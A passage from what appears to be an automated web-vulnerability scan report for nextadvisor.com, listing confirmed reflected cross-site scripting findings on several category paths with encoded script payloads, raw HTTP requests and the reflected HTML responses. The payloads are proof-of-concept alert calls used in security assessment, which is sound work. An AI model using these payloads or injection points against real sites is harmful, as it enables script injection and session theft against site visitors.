value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="people_search"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a 
href="/link.php?kw=..
- /remote_desktop/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000327)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000327)%3C/script%3E

/remote_desktop/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000327)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000327)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/remote_desktop/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000327)</script>

Request

GET /remote_desktop/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000327)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/remote_desktop/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6159
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", remote desktop, remote access, remote desktop access, GoToMyPC, Radmin, LapLink Everywhere, Symantech pcAnywhere" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/remote_desktop/'"--></style></script><script>netsparker(0x000327)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> 
<div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> 
<li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000327)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 
'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/remote_desktop_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Remote Desktop FAQ</h1> <p>Frequently Asked Questions about Remote Desktop</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Remote Desktop:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> 
</form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="remote_desktop"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a 
href="/link.php?kw=..
- /savings_accounts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000332)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000332)%3C/script%3E

/savings_accounts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000332)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000332)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/savings_accounts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000332)</script>

Request

GET /savings_accounts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000332)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/savings_accounts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6084
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", savings account, savings accounts, online banks, internet banking, internet saving, Ally, ING Direct, Discover Online Savings Account, EverBank" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/savings_accounts/'"--></style></script><script>netsparker(0x000332)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start 
Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web 
Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000332)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && 
showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/savings_accounts_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Savings Accounts FAQ</h1> <p>Frequently Asked Questions about Savings Accounts</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Savings Accounts:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" 
/> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="savings_accounts"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a 
href="/link.php?kw=..
- /internet_security_software/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000345)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000345)%3C/script%3E

/internet_security_software/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000345)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000345)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/internet_security_software/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000345)</script>

Request

GET /internet_security_software/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000345)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/internet_security_software/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 7452
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", internet security software, antivirus, anti-spyware, virus removal, spyware removal, spyware, spam blocker, Norton Internet Security 2011, Eset, BitDefender, Kaspersky Internet Security 2011, McAfee Total Protection 2011, Avast! Internet Security, Webroot Internet Security Complete 2011, AVG Internet Security, ZoneAlarm Internet Security Suite 2010, CA Internet Security Suite Plus 2010, Trend Micro Internet Security 2010" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/internet_security_software/'"--></style></script><script>netsparker(0x000345)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a 
href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option 
value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000345)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script 
type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/internet_security_software_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Internet Security Software FAQ</h1> <p>Frequently Asked Questions about Internet Security Software</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for 
